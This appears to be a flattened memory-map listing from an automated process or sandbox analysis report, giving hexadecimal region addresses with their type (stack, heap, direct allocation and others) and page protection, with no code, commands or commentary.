||
|
33C2F000
|
stack
|
page read and write
|
||
|
71E000
|
heap
|
page read and write
|
||
|
7FF67DFB3000
|
unkown
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
304D67D000
|
stack
|
page read and write
|
||
|
15A30F30000
|
heap
|
page execute and read and write
|
||
|
2520000
|
direct allocation
|
page read and write
|
||
|
1A6CD000
|
direct allocation
|
page read and write
|
||
|
215EF2E0000
|
heap
|
page read and write
|
||
|
1FD2273B000
|
heap
|
page read and write
|
||
|
15A4B048000
|
heap
|
page read and write
|
||
|
1E50ACFC000
|
heap
|
page read and write
|
||
|
15A30F40000
|
trusted library allocation
|
page read and write
|
||
|
1AD2F000
|
stack
|
page read and write
|
||
|
22C65420000
|
heap
|
page read and write
|
||
|
17C1ED00000
|
heap
|
page read and write
|
||
|
2A4C8530000
|
heap
|
page read and write
|
||
|
2561000
|
direct allocation
|
page read and write
|
||
|
7FF67DE30000
|
unkown
|
page readonly
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
7FF67DFC5000
|
unkown
|
page write copy
|
||
|
7EF85000
|
direct allocation
|
page read and write
|
||
|
15A30F20000
|
heap
|
page readonly
|
||
|
1C10FBF4000
|
heap
|
page read and write
|
||
|
7FF67DFB8000
|
unkown
|
page read and write
|
||
|
1AC2E000
|
stack
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
15A4AEA8000
|
heap
|
page read and write
|
||
|
7F130000
|
direct allocation
|
page read and write
|
||
|
2BF6F430000
|
heap
|
page read and write
|
||
|
17C1ED14000
|
heap
|
page read and write
|
||
|
1D463FF000
|
stack
|
page read and write
|
||
|
1B034000
|
direct allocation
|
page execute and read and write
|
||
|
1A6F8000
|
direct allocation
|
page read and write
|
||
|
1D51A234000
|
heap
|
page read and write
|
||
|
15A349D6000
|
trusted library allocation
|
page read and write
|
||
|
1D51A180000
|
heap
|
page read and write
|
||
|
1B6CA000
|
heap
|
page read and write
|
||
|
7FF67DE31000
|
unkown
|
page execute read
|
||
|
1C6B9130000
|
heap
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
28427404000
|
heap
|
page read and write
|
||
|
1C6B9465000
|
heap
|
page read and write
|
||
|
7EB70000
|
direct allocation
|
page read and write
|
||
|
265FDA40000
|
heap
|
page read and write
|
||
|
7FF67DFC8000
|
unkown
|
page readonly
|
||
|
7FBF0000
|
direct allocation
|
page read and write
|
||
|
90E000
|
stack
|
page read and write
|
||
|
840000
|
heap
|
page read and write
|
||
|
4E90000
|
heap
|
page read and write
|
||
|
2A4C8450000
|
heap
|
page read and write
|
||
|
1FB5C670000
|
heap
|
page read and write
|
||
|
C2F7FC000
|
stack
|
page read and write
|
||
|
7FF655890000
|
unkown
|
page readonly
|
||
|
15A34608000
|
trusted library allocation
|
page read and write
|
||
|
265FF5D0000
|
heap
|
page read and write
|
||
|
15A32905000
|
heap
|
page read and write
|
||
|
1D51A080000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
2859CFE000
|
stack
|
page read and write
|
||
|
353C5DE000
|
stack
|
page read and write
|
||
|
293021F4000
|
heap
|
page read and write
|
||
|
7A5000
|
heap
|
page read and write
|
||
|
1A0BF420000
|
heap
|
page read and write
|
||
|
1C10FA70000
|
heap
|
page read and write
|
||
|
206DF000
|
direct allocation
|
page read and write
|
||
|
1730D474000
|
heap
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
24F3000
|
heap
|
page read and write
|
||
|
BEB191E000
|
stack
|
page read and write
|
||
|
77F000
|
heap
|
page read and write
|
||
|
1B4AD000
|
heap
|
page read and write
|
||
|
2FBD000
|
heap
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
33B2E000
|
stack
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
1FB5C650000
|
heap
|
page read and write
|
||
|
1B000000
|
remote allocation
|
page read and write
|
||
|
20DCF000
|
stack
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
15A32763000
|
trusted library allocation
|
page read and write
|
||
|
7748CFF000
|
stack
|
page read and write
|
||
|
22ED000
|
direct allocation
|
page read and write
|
||
|
BB0000
|
direct allocation
|
page execute and read and write
|
||
|
215EF440000
|
heap
|
page read and write
|
||
|
C2FBFE000
|
stack
|
page read and write
|
||
|
665000
|
heap
|
page read and write
|
||
|
22C674F1000
|
heap
|
page read and write
|
||
|
7FF655890000
|
unkown
|
page readonly
|
||
|
22C65426000
|
heap
|
page read and write
|
||
|
1A6EA000
|
direct allocation
|
page read and write
|
||
|
2859D7E000
|
stack
|
page read and write
|
||
|
600000
|
heap
|
page read and write
|
||
|
1730D0C0000
|
heap
|
page read and write
|
||
|
C0092FF000
|
stack
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
BE7000
|
heap
|
page read and write
|
||
|
720000
|
heap
|
page read and write
|
||
|
7F070000
|
direct allocation
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
1730D470000
|
heap
|
page read and write
|
||
|
7F110000
|
direct allocation
|
page read and write
|
||
|
1C10FBF5000
|
heap
|
page read and write
|
||
|
13AD87E000
|
stack
|
page read and write
|
||
|
1E50AD48000
|
heap
|
page read and write
|
||
|
7FF789C01000
|
unkown
|
page read and write
|
||
|
2B0A000
|
stack
|
page read and write
|
||
|
7FF67DFBD000
|
unkown
|
page readonly
|
||
|
55C000
|
unkown
|
page read and write
|
||
|
638000
|
heap
|
page read and write
|
||
|
304D77E000
|
stack
|
page read and write
|
||
|
1FD2274E000
|
heap
|
page read and write
|
||
|
1730D475000
|
heap
|
page read and write
|
||
|
15A327B0000
|
heap
|
page read and write
|
||
|
7EA9F000
|
direct allocation
|
page read and write
|
||
|
FCB31FF000
|
stack
|
page read and write
|
||
|
1C602270000
|
heap
|
page read and write
|
||
|
7FF789C01000
|
unkown
|
page read and write
|
||
|
17C1ED17000
|
heap
|
page read and write
|
||
|
1B6CE000
|
stack
|
page read and write
|
||
|
827000
|
heap
|
page read and write
|
||
|
1AC2E000
|
stack
|
page read and write
|
||
|
22C67452000
|
heap
|
page read and write
|
||
|
1E5089B0000
|
heap
|
page read and write
|
||
|
BD0000
|
heap
|
page read and write
|
||
|
B4F000
|
stack
|
page read and write
|
||
|
22C6721D000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
1F831E90000
|
heap
|
page read and write
|
||
|
1FD22758000
|
heap
|
page read and write
|
||
|
A3F000
|
stack
|
page read and write
|
||
|
1B468000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
30EB9BF000
|
stack
|
page read and write
|
||
|
1A70F000
|
direct allocation
|
page read and write
|
||
|
7FF789C0F000
|
unkown
|
page read and write
|
||
|
1A6A3000
|
direct allocation
|
page read and write
|
||
|
15A349DA000
|
trusted library allocation
|
page read and write
|
||
|
1C6B9050000
|
heap
|
page read and write
|
||
|
284273D0000
|
heap
|
page read and write
|
||
|
265FDB6A000
|
heap
|
page read and write
|
||
|
2F7E000
|
stack
|
page read and write
|
||
|
1730D0A0000
|
heap
|
page read and write
|
||
|
7FF848FCA000
|
trusted library allocation
|
page read and write
|
||
|
17C1ED3E000
|
heap
|
page read and write
|
||
|
7FC8D000
|
direct allocation
|
page read and write
|
||
|
1C6B9460000
|
heap
|
page read and write
|
||
|
EA5F0FF000
|
stack
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page write copy
|
||
|
15E7E2C0000
|
heap
|
page read and write
|
||
|
30EBA36000
|
stack
|
page read and write
|
||
|
1FD22660000
|
heap
|
page read and write
|
||
|
2276000
|
direct allocation
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
1B7A2000
|
heap
|
page read and write
|
||
|
1FD2275B000
|
heap
|
page read and write
|
||
|
2BF6F400000
|
heap
|
page read and write
|
||
|
28429850000
|
heap
|
page read and write
|
||
|
7FF67DE30000
|
unkown
|
page readonly
|
||
|
7FF789C01000
|
unkown
|
page read and write
|
||
|
284270B9000
|
heap
|
page read and write
|
||
|
2BB0000
|
heap
|
page read and write
|
||
|
7F282000
|
direct allocation
|
page read and write
|
||
|
1C6B9197000
|
heap
|
page read and write
|
||
|
1B458000
|
heap
|
page read and write
|
||
|
15A32D20000
|
heap
|
page execute and read and write
|
||
|
1BA14000
|
direct allocation
|
page execute and read and write
|
||
|
1A724000
|
direct allocation
|
page read and write
|
||
|
30EBBBE000
|
stack
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
9FF000
|
stack
|
page read and write
|
||
|
1FB5C7A0000
|
heap
|
page read and write
|
||
|
22C67424000
|
heap
|
page read and write
|
||
|
7FF789C01000
|
unkown
|
page read and write
|
||
|
33C34000
|
heap
|
page read and write
|
||
|
1C6B9290000
|
heap
|
page read and write
|
||
|
BA0000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
30EBC3F000
|
stack
|
page read and write
|
||
|
22C67426000
|
heap
|
page read and write
|
||
|
7FF789C14000
|
unkown
|
page read and write
|
||
|
7FF789C1C000
|
unkown
|
page write copy
|
||
|
17C1ED48000
|
heap
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
2311000
|
direct allocation
|
page read and write
|
||
|
2BF6F49B000
|
heap
|
page read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
207AA000
|
direct allocation
|
page read and write
|
||
|
FC902FF000
|
stack
|
page read and write
|
||
|
45A000
|
unkown
|
page read and write
|
||
|
7FF6558D4000
|
unkown
|
page readonly
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
17C1EE33000
|
heap
|
page read and write
|
||
|
1FB5C6A7000
|
heap
|
page read and write
|
||
|
1E50AD2E000
|
heap
|
page read and write
|
||
|
A21717F000
|
stack
|
page read and write
|
||
|
2320000
|
heap
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
209FF000
|
stack
|
page read and write
|
||
|
7FF789C01000
|
unkown
|
page read and write
|
||
|
7FC40000
|
direct allocation
|
page read and write
|
||
|
1F1FAFA0000
|
heap
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
7FC70000
|
direct allocation
|
page read and write
|
||
|
2A4C853B000
|
heap
|
page read and write
|
||
|
CD002FE000
|
stack
|
page read and write
|
||
|
339EE000
|
stack
|
page read and write
|
||
|
1AEBE000
|
stack
|
page read and write
|
||
|
1B69E000
|
heap
|
page read and write
|
||
|
7F150000
|
direct allocation
|
page read and write
|
||
|
7EB60000
|
direct allocation
|
page read and write
|
||
|
55A000
|
unkown
|
page read and write
|
||
|
7E9A0000
|
direct allocation
|
page read and write
|
||
|
1FB5C905000
|
heap
|
page read and write
|
||
|
1FB5C6C7000
|
heap
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
4B44000
|
heap
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page read and write
|
||
|
800000
|
heap
|
page read and write
|
||
|
265FDB9B000
|
heap
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
7EA70000
|
direct allocation
|
page read and write
|
||
|
1AFBF000
|
stack
|
page read and write
|
||
|
1AFEB000
|
direct allocation
|
page execute and read and write
|
||
|
45A000
|
unkown
|
page read and write
|
||
|
7EF10000
|
direct allocation
|
page read and write
|
||
|
C0093FF000
|
stack
|
page read and write
|
||
|
17C1EEC5000
|
heap
|
page read and write
|
||
|
29302524000
|
heap
|
page read and write
|
||
|
22C67113000
|
heap
|
page read and write
|
||
|
1A0BF7B4000
|
heap
|
page read and write
|
||
|
265FDB57000
|
heap
|
page read and write
|
||
|
17C1ED4C000
|
heap
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
2842740D000
|
heap
|
page read and write
|
||
|
24F0000
|
heap
|
page read and write
|
||
|
2A4C84C0000
|
heap
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E650000
|
direct allocation
|
page read and write
|
||
|
20A3E000
|
stack
|
page read and write
|
||
|
13AD97E000
|
stack
|
page read and write
|
||
|
15A34213000
|
trusted library allocation
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
2544000
|
direct allocation
|
page read and write
|
||
|
7D7000
|
heap
|
page read and write
|
||
|
7F150000
|
direct allocation
|
page read and write
|
||
|
7FF789C01000
|
unkown
|
page read and write
|
||
|
6EE000
|
stack
|
page read and write
|
||
|
1B45B000
|
heap
|
page read and write
|
||
|
15A30E60000
|
heap
|
page read and write
|
||
|
1BA64000
|
direct allocation
|
page execute and read and write
|
||
|
293021C0000
|
heap
|
page read and write
|
||
|
7FF789C1C000
|
unkown
|
page write copy
|
||
|
7F150000
|
direct allocation
|
page read and write
|
||
|
1FD22695000
|
heap
|
page read and write
|
||
|
7FF789C09000
|
unkown
|
page read and write
|
||
|
15A30C70000
|
heap
|
page read and write
|
||
|
1FD24E00000
|
heap
|
page read and write
|
||
|
17C1EEC0000
|
heap
|
page read and write
|
||
|
7FF789C1C000
|
unkown
|
page write copy
|
||
|
7FA30000
|
direct allocation
|
page read and write
|
||
|
7FF67DE31000
|
unkown
|
page execute read
|
||
|
2370000
|
heap
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
|
7FF67DFC6000
|
unkown
|
page readonly
|
||
|
7F0AF000
|
direct allocation
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page read and write
|
||
|
1A83E000
|
stack
|
page read and write
|
||
|
7FF789C01000
|
unkown
|
page read and write
|
||
|
7EA18000
|
direct allocation
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
1A6B8000
|
direct allocation
|
page read and write
|
||
|
19DB2020000
|
heap
|
page read and write
|
||
|
20F5E000
|
stack
|
page read and write
|
||
|
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D519FA8000
|
heap
|
page read and write
|
||
|
640000
|
heap
|
page read and write
|
||
|
28427077000
|
heap
|
page read and write
|
||
|
28427097000
|
heap
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
304D3DE000
|
stack
|
page read and write
|
||
|
2553000
|
direct allocation
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
7FF703A07000
|
unkown
|
page readonly
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
265FFB10000
|
heap
|
page read and write
|
||
|
15A30CB0000
|
heap
|
page read and write
|
||
|
215EF11B000
|
heap
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
2A4C8370000
|
heap
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
285A07F000
|
stack
|
page read and write
|
||
|
287A000
|
direct allocation
|
page execute and read and write
|
||
|
729C6FE000
|
stack
|
page read and write
|
||
|
1BA10000
|
direct allocation
|
page execute and read and write
|
||
|
22C65424000
|
heap
|
page read and write
|
||
|
1F831CA7000
|
heap
|
page read and write
|
||
|
1E50A5A3000
|
heap
|
page read and write
|
||
|
D3B5EC000
|
stack
|
page read and write
|
||
|
15A4AE96000
|
heap
|
page read and write
|
||
|
1BA5B000
|
direct allocation
|
page execute and read and write
|
||
|
7FF789C0F000
|
unkown
|
page read and write
|
||
|
1730D2B0000
|
heap
|
page read and write
|
||
|
1AFE0000
|
direct allocation
|
page execute and read and write
|
||
|
1D462FE000
|
stack
|
page read and write
|
||
|
7F200000
|
direct allocation
|
page read and write
|
||
|
2318000
|
direct allocation
|
page read and write
|
||
|
7FF789C1C000
|
unkown
|
page write copy
|
||
|
A4E000
|
stack
|
page read and write
|
||
|
7FF655893000
|
unkown
|
page read and write
|
||
|
1C10FBF0000
|
heap
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
7FF789C1D000
|
unkown
|
page readonly
|
||
|
1D519F8B000
|
heap
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
1A73A000
|
direct allocation
|
page read and write
|
||
|
2440000
|
direct allocation
|
page execute and read and write
|
||
|
7FC000
|
heap
|
page read and write
|
||
|
15E7E02C000
|
heap
|
page read and write
|
||
|
1AA7F000
|
stack
|
page read and write
|
||
|
7FF67DE31000
|
unkown
|
page execute read
|
||
|
1B031000
|
direct allocation
|
page execute and read and write
|
||
|
7FF789BFD000
|
unkown
|
page read and write
|
||
|
215EF445000
|
heap
|
page read and write
|
||
|
15A4B030000
|
heap
|
page read and write
|
||
|
605000
|
heap
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
15A32900000
|
heap
|
page read and write
|
||
|
1D45FEC000
|
stack
|
page read and write
|
||
|
2B4C000
|
stack
|
page read and write
|
||
|
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
|
28427060000
|
heap
|
page read and write
|
||
|
7FF703A06000
|
unkown
|
page write copy
|
||
|
7FF789BFD000
|
unkown
|
page write copy
|
||
|
7FF789C1D000
|
unkown
|
page readonly
|
||
|
1C10F860000
|
heap
|
page read and write
|
||
|
7FF655881000
|
unkown
|
page execute read
|
||
|
7FF789BFD000
|
unkown
|
page read and write
|
||
|
7CA000
|
heap
|
page read and write
|
||
|
C3C000
|
stack
|
page read and write
|
||
|
7F19F000
|
direct allocation
|
page read and write
|
||
|
2842708A000
|
heap
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
1B70F000
|
heap
|
page read and write
|
||
|
1FD22710000
|
heap
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page write copy
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
1FD2274D000
|
heap
|
page read and write
|
||
|
46262FC000
|
stack
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
1FD2272A000
|
heap
|
page read and write
|
||
|
1FD240C3000
|
heap
|
page read and write
|
||
|
30EC78E000
|
stack
|
page read and write
|
||
|
D3B8FE000
|
stack
|
page read and write
|
||
|
29E5000
|
direct allocation
|
page execute and read and write
|
||
|
68E000
|
stack
|
page read and write
|
||
|
1D51A235000
|
heap
|
page read and write
|
||
|
1FD226A0000
|
heap
|
page read and write
|
||
|
293021F7000
|
heap
|
page read and write
|
||
|
7EFF0000
|
direct allocation
|
page read and write
|
||
|
7EB60000
|
direct allocation
|
page read and write
|
||
|
17C1ED4C000
|
heap
|
page read and write
|
||
|
71A000
|
heap
|
page read and write
|
||
|
28427070000
|
heap
|
page read and write
|
||
|
7E720000
|
direct allocation
|
page read and write
|
||
|
7FF7039F0000
|
unkown
|
page readonly
|
||
|
17C20BA0000
|
trusted library allocation
|
page read and write
|
||
|
6B6000
|
heap
|
page read and write
|
||
|
19D000
|
stack
|
page read and write
|
||
|
7F1F8000
|
direct allocation
|
page read and write
|
||
|
2842708A000
|
heap
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
83B000
|
heap
|
page read and write
|
||
|
15E7E2B5000
|
heap
|
page read and write
|
||
|
7F8000
|
heap
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
1D519FA8000
|
heap
|
page read and write
|
||
|
293021D0000
|
heap
|
page read and write
|
||
|
17C1ED09000
|
heap
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page read and write
|
||
|
1FD22718000
|
heap
|
page read and write
|
||
|
7FF848FC1000
|
trusted library allocation
|
page read and write
|
||
|
1B027000
|
direct allocation
|
page execute and read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
2FA7000
|
heap
|
page read and write
|
||
|
19DB2010000
|
heap
|
page read and write
|
||
|
28428D03000
|
heap
|
page read and write
|
||
|
15E7E020000
|
heap
|
page read and write
|
||
|
1D51A160000
|
heap
|
page read and write
|
||
|
1C10F88B000
|
heap
|
page read and write
|
||
|
C2FA7F000
|
stack
|
page read and write
|
||
|
7F1F0000
|
direct allocation
|
page read and write
|
||
|
29302520000
|
heap
|
page read and write
|
||
|
215EF133000
|
heap
|
page read and write
|
||
|
207B8000
|
direct allocation
|
page read and write
|
||
|
1B6BE000
|
heap
|
page read and write
|
||
|
231C000
|
direct allocation
|
page read and write
|
||
|
1A6C6000
|
direct allocation
|
page read and write
|
||
|
15A42F66000
|
trusted library allocation
|
page read and write
|
||
|
FCB30FF000
|
stack
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
1B14F000
|
stack
|
page read and write
|
||
|
33C38000
|
heap
|
page read and write
|
||
|
7EA30000
|
direct allocation
|
page read and write
|
||
|
1B312000
|
heap
|
page read and write
|
||
|
2256000
|
direct allocation
|
page read and write
|
||
|
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
|
1730D0E5000
|
heap
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
1A748000
|
direct allocation
|
page read and write
|
||
|
C008F5C000
|
stack
|
page read and write
|
||
|
7E7F0000
|
direct allocation
|
page read and write
|
||
|
1C10F850000
|
heap
|
page read and write
|
||
|
2A4C8630000
|
heap
|
page read and write
|
||
|
796000
|
heap
|
page read and write
|
||
|
1E50AD2A000
|
heap
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
17C1ED2C000
|
heap
|
page read and write
|
||
|
15A32FE2000
|
trusted library allocation
|
page read and write
|
||
|
7FF67DE30000
|
unkown
|
page readonly
|
||
|
7F4000
|
heap
|
page read and write
|
||
|
53D37FE000
|
stack
|
page read and write
|
||
|
265FDB66000
|
heap
|
page read and write
|
||
|
30EB6FF000
|
stack
|
page read and write
|
||
|
729C34C000
|
stack
|
page read and write
|
||
|
15A42DBF000
|
trusted library allocation
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
15E7E2B4000
|
heap
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
30EBB38000
|
stack
|
page read and write
|
||
|
1FB5C6C7000
|
heap
|
page read and write
|
||
|
215EF080000
|
heap
|
page read and write
|
||
|
1B9F1000
|
direct allocation
|
page execute and read and write
|
||
|
7FF789C0F000
|
unkown
|
page read and write
|
||
|
1AABE000
|
stack
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
7FF789C0F000
|
unkown
|
page read and write
|
||
|
7F210000
|
direct allocation
|
page read and write
|
||
|
7EFE0000
|
direct allocation
|
page read and write
|
||
|
1AD7E000
|
stack
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
19DB1F60000
|
heap
|
page read and write
|
||
|
1B848000
|
heap
|
page read and write
|
||
|
7E830000
|
direct allocation
|
page read and write
|
||
|
22C6761A000
|
heap
|
page read and write
|
||
|
C2FB7C000
|
stack
|
page read and write
|
||
|
7FF789C1C000
|
unkown
|
page write copy
|
||
|
1B6F2000
|
heap
|
page read and write
|
||
|
781000
|
heap
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
7FF67DFC6000
|
unkown
|
page readonly
|
||
|
265FDC50000
|
heap
|
page read and write
|
||
|
1A72C000
|
direct allocation
|
page read and write
|
||
|
1AD2F000
|
stack
|
page read and write
|
||
|
1730D290000
|
heap
|
page read and write
|
||
|
17C1ECB0000
|
heap
|
page read and write
|
||
|
230D000
|
direct allocation
|
page read and write
|
||
|
1C10FA50000
|
heap
|
page read and write
|
||
|
15A32DA0000
|
heap
|
page execute and read and write
|
||
|
28427098000
|
heap
|
page read and write
|
||
|
17C1ED2C000
|
heap
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
7FF67DFC5000
|
unkown
|
page write copy
|
||
|
7EB60000
|
direct allocation
|
page read and write
|
||
|
7FC85000
|
direct allocation
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
765000
|
heap
|
page read and write
|
||
|
A2170FF000
|
stack
|
page read and write
|
||
|
1F1FB384000
|
heap
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page write copy
|
||
|
1FB5C570000
|
heap
|
page read and write
|
||
|
1B02B000
|
direct allocation
|
page execute and read and write
|
||
|
15A30D37000
|
heap
|
page read and write
|
||
|
15A30F10000
|
trusted library allocation
|
page read and write
|
||
|
C1CFBFF000
|
stack
|
page read and write
|
||
|
7EAA8000
|
direct allocation
|
page read and write
|
||
|
7FF789BC1000
|
unkown
|
page execute read
|
||
|
1B597000
|
heap
|
page read and write
|
||
|
EA5EEFC000
|
stack
|
page read and write
|
||
|
FC901FF000
|
stack
|
page read and write
|
||
|
7DC000
|
heap
|
page read and write
|
||
|
BA0000
|
heap
|
page read and write
|
||
|
265FDD60000
|
heap
|
page read and write
|
||
|
1B80C000
|
stack
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
7FF67DF4E000
|
unkown
|
page readonly
|
||
|
7FF67DFC8000
|
unkown
|
page readonly
|
||
|
7FF789C09000
|
unkown
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
1A61F000
|
direct allocation
|
page read and write
|
||
|
998A78F000
|
stack
|
page read and write
|
||
|
1E50A6F0000
|
heap
|
page read and write
|
||
|
338AC000
|
stack
|
page read and write
|
||
|
1A7FB000
|
stack
|
page read and write
|
||
|
7FF655881000
|
unkown
|
page execute read
|
||
|
7FF655880000
|
unkown
|
page readonly
|
||
|
1A6F1000
|
direct allocation
|
page read and write
|
||
|
7FF789C19000
|
unkown
|
page readonly
|
||
|
1ABBF000
|
stack
|
page read and write
|
||
|
1D519FA8000
|
heap
|
page read and write
|
||
|
20794000
|
direct allocation
|
page read and write
|
||
|
253D000
|
direct allocation
|
page read and write
|
||
|
1E508990000
|
heap
|
page read and write
|
||
|
1D51A230000
|
heap
|
page read and write
|
||
|
28427083000
|
heap
|
page read and write
|
||
|
265FDCC0000
|
heap
|
page read and write
|
||
|
284270B4000
|
heap
|
page read and write
|
||
|
7E950000
|
direct allocation
|
page read and write
|
||
|
265FDB6A000
|
heap
|
page read and write
|
||
|
1FD2271F000
|
heap
|
page read and write
|
||
|
74E000
|
heap
|
page read and write
|
||
|
17C1ECD0000
|
heap
|
page read and write
|
||
|
1FD2275D000
|
heap
|
page read and write
|
||
|
7FF789BFD000
|
unkown
|
page read and write
|
||
|
215EF090000
|
heap
|
page read and write
|
||
|
55C000
|
unkown
|
page read and write
|
||
|
3210000
|
heap
|
page read and write
|
||
|
1FB5C6C7000
|
heap
|
page read and write
|
||
|
255A000
|
direct allocation
|
page read and write
|
||
|
15A30E80000
|
heap
|
page read and write
|
||
|
15A32DB1000
|
trusted library allocation
|
page read and write
|
||
|
2842709C000
|
heap
|
page read and write
|
||
|
1BA57000
|
direct allocation
|
page execute and read and write
|
||
|
1FD2272A000
|
heap
|
page read and write
|
||
|
265FDB98000
|
heap
|
page read and write
|
||
|
1AFC1000
|
direct allocation
|
page execute and read and write
|
||
|
1D519FA8000
|
heap
|
page read and write
|
||
|
7FF848E12000
|
trusted library allocation
|
page read and write
|
||
|
17C1ED1B000
|
heap
|
page read and write
|
||
|
1A0BF390000
|
heap
|
page read and write
|
||
|
7FF789C01000
|
unkown
|
page read and write
|
||
|
7FF789C1D000
|
unkown
|
page readonly
|
||
|
21D0000
|
heap
|
page read and write
|
||
|
7F150000
|
direct allocation
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
53D38FF000
|
stack
|
page read and write
|
||
|
7FE10000
|
direct allocation
|
page read and write
|
||
|
7EF30000
|
direct allocation
|
page read and write
|
||
|
15A30F80000
|
heap
|
page read and write
|
||
|
C80000
|
heap
|
page read and write
|
||
|
15A4ADCC000
|
heap
|
page read and write
|
||
|
265FDB7C000
|
heap
|
page read and write
|
||
|
1F831C8B000
|
heap
|
page read and write
|
||
|
2BF6F660000
|
heap
|
page read and write
|
||
|
265FDB9B000
|
heap
|
page read and write
|
||
|
13AD8FE000
|
stack
|
page read and write
|
||
|
7DF000
|
heap
|
page read and write
|
||
|
7FF789BF2000
|
unkown
|
page readonly
|
||
|
1A716000
|
direct allocation
|
page read and write
|
||
|
5ECCFE000
|
stack
|
page read and write
|
||
|
1AFE4000
|
direct allocation
|
page execute and read and write
|
||
|
2FB3000
|
heap
|
page read and write
|
||
|
15A42E2F000
|
trusted library allocation
|
page read and write
|
||
|
293021DB000
|
heap
|
page read and write
|
||
|
22C6745E000
|
heap
|
page read and write
|
||
|
6B0000
|
heap
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
7B3000
|
heap
|
page read and write
|
||
|
1A708000
|
direct allocation
|
page read and write
|
||
|
7FF789BC0000
|
unkown
|
page readonly
|
||
|
1E50AAF5000
|
heap
|
page read and write
|
||
|
7FF789C1C000
|
unkown
|
page write copy
|
||
|
254C000
|
direct allocation
|
page read and write
|
||
|
284270B8000
|
heap
|
page read and write
|
||
|
1E50AD36000
|
heap
|
page read and write
|
||
|
1A84B000
|
stack
|
page read and write
|
||
|
1A741000
|
direct allocation
|
page read and write
|
||
|
19DB2034000
|
heap
|
page read and write
|
||
|
17C1ED4C000
|
heap
|
page read and write
|
||
|
